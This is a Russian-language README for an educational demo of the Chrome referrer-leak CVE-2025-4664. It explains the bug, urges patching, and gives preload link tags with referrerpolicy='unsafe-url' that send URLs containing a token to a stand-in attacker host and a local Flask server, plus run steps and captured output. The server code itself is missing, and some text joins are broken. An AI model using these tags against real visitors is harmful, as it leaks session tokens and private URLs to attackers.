
Образовательная демонстрация CVE-2025-4664, уязвимости Chrome Loader, позволяющей осуществлять утечку данных между источниками через манипуляцию заголовком referrer-policy. Включает HTML-страницу жертвы и сервер Flask атакующего для практического моделирования эксплуатации.
Уязвимость CVE-2025-4664 — это ошибка безопасности высокой степени серьезности, выявленная в компоненте Loader браузера Google Chrome в версиях до 136.0.7103.113. Данная проблема позволяет удаленному злоумышленнику утекать данные из другого источника с помощью специально созданной HTML-страницы, что может привести к компрометации конфиденциальной информации, такой как токены сессий или учетные данные для аутентификации.
Ошибка заключается в некорректной реализации политик безопасности в компоненте Loader Chrome. В частности, Chrome интерпретирует директиву referrer-policy внутри HTTP-заголовка Link в запросах подресурсов (таких как изображения или скрипты), в то время как другие браузеры этого не делают. Злоумышленник может использовать это, установив менее строгую политику, например unsafe-url, что приводит к тому, что Chrome передает полные URL, включая конфиденциальные параметры, на домены, контролируемые злоумышленником.
Эта уязвимость активно эксплуатировалась в реальных условиях, что побудило Агентство по кибербезопасности и безопасности инфраструктуры США (CISA) включить ее в свой каталог известных и используемых уязвимостей (KEV). CISA установила 5 июня 2025 года крайним сроком для федеральных агентств по применению соответствующих исправлений.
Google выпустил обновления для исправления этой уязвимости в следующих версиях:
Настоятельно рекомендуется всем пользователям обновить свой браузер Chrome до последней доступной версии. Чтобы проверить и применить обновление:
Кроме того, пользователи браузеров на основе Chromium, таких как Microsoft Edge, Brave, Opera и Vivaldi, должны следить за соответствующими обновлениями, так как они также могут быть подвержены этой уязвимости.
Поддержание браузера в актуальном состоянии необходимо для защиты от активных угроз безопасности и сохранения личной информации.
Уязвимость CVE-2025-4664 эксплуатируется путем манипуляции тем, как Google Chrome обрабатывает политику реферера (referrer-policy) при загрузке подресурсов (таких как изображения, скрипты и т.д.) из HTML-ссылок.
🌐 Создание вредоносного сайта:
Злоумышленник создает веб-сайт, который включает в свой HTTP-заголовок HTML-ссылку, подобную этой:
<link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
🔧 Манипуляция referrer-policy: В большинстве браузеров эта referrer-policy в теге не применяется к загружаемому ресурсу. Однако Chrome применяет её, что и является основной проблемой.
📤 Утечка Referer: Когда браузер жертвы (Chrome) загружает ресурс с victima.com, он отправляет полный URL исходного сайта в заголовке Referer, который может включать:
🎯 Получение на сервере злоумышленника: Злоумышленник может указать в качестве назначения ресурса URL под своим контролем, например:
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">
Когда жертва обращается к этому ресурсу, Chrome отправляет полный URL жертвы в качестве Referer на сервер злоумышленника.
🕵️ Кража информации: Сервер злоумышленника регистрирует HTTP-заголовки и получает полное содержимое URL жертвы. Это может включать конфиденциальные данные, токены доступа или даже URL внутренних API.
https://atacante.com/pagina-maliciosa.html
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
Referer: https://victima.com/perfil?token=ABC123
на домен атакующего, раскрывая токен.

index.html — Файл жертвыЭтот файл имитирует жертву атаки, это упрощенная HTML-демонстрация, показывающая, как можно эксплуатировать уязвимость CVE-2025-4664 с помощью вредоносного тега :
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Этот ресурс указывает на сайт жертвы с конфиденциальной информацией в URL -->
<link rel="preload" as="image"
href="https://victima.com/perfil?token=ABC123"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Демонстрация уязвимости CVE-2025-4664</h1>
<p>Если вы используете уязвимую версию Chrome, браузер отправит <strong>полный Referer</strong> на указанный выше URL.</p>
</body>
</html>
servidor_atacante.py — Файл атакующегоС помощью этого скрипта можно автоматизировать атаку для захвата Referer, используя небольшой сервер на Python. Вот пример с использованием Flask для имитации сервера атакующего, который принимает данные:
index.html.pip install flask
python servidor_atacante.py
<link rel="preload" as="image"
href="http://<tu_IP>:8080/captura.jpg"
referrerpolicy="unsafe-url">
Замените <tu_IP> на публичный или локальный IP-адрес сервера, на котором выполняется скрипт.
Откройте терминал (PowerShell или CMD).
Перейдите в папку с файлом:
cd "C:\Users\Sebas\Desktop\servidor_atacante"
python servidor_atacante.py
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080
В той же папке (C:\Users\Sebas\Desktop\servidor_atacante) создайте файл с именем index.html и следующим содержимым:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Имитация атаки -->
<link rel="preload" as="image"
href="http://192.168.1.35:8080/captura.jpg"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Симуляция CVE-2025-4664</h1>
<p>Этот HTML пытается отправить полный URL (включая токен) злоумышленнику.</p>
</body>
</html>
✅ Важно: Убедитесь, что IP (192.168.1.35) совпадает с тем, который показывает Flask как локальный IP. Если он отличается, измените его в HTML.
Откройте Chrome.
В адресной строке введите:
file:///C:/[Папка назначения]/servidor_atacante/index.html?token=ABC123
Нажмите Enter.
📥 Посмотреть результат на сервере В консоли Flask вы должны увидеть что-то вроде:
[+] Referer получен: file:///C:/[Папка назначения]/servidor_atacante/index.html?token=ABC123
[Папка назначения]: Измените этот параметр на путь, где сохранен файл.
🎯 Это означает, что браузер отправил полный Referer злоумышленнику!
Объяснение подготовлено Sebastian Peinador для учебных целей и исследований в области атакующей кибербезопасности.
Этот материал распространяется под лицензией MIT.
Если это оказалось полезным, не забудьте поставить ⭐ репозиторию или поделиться им!